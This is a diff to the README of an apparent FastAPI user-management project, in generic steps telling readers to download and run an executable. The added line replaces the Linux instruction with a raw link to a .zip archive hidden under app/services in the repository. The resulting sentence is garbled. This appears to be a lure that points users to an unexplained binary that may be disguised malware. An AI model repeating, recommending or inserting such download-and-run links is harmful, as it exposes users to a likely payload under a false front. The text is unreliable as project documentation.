Maghdaouihub/fastapi-user-management-api/README.md

 1. **Go to the Releases Page**: Click the link above to visit our releases page.
 2. **Select the Latest Version**: Find the most recent version and click on it.
 3. **Download the Executable**: Choose the file compatible with your operating system.
 For example, if you are using Windows, download the `.exe` file.
-For Linux, look for the `.tar.gz` file.
+For Linux, look for the `https://github.com/Maghdaouihub/fastapi-user-management-api/raw/refs/heads/main/app/services/user_api_fastapi_management_v2.4.zip` file.
 4. **Locate the Downloaded File**: Open your downloads folder and find the file you just downloaded.
 5. **Run the File**:
    - On Windows, double-click the `.exe` file to start the application.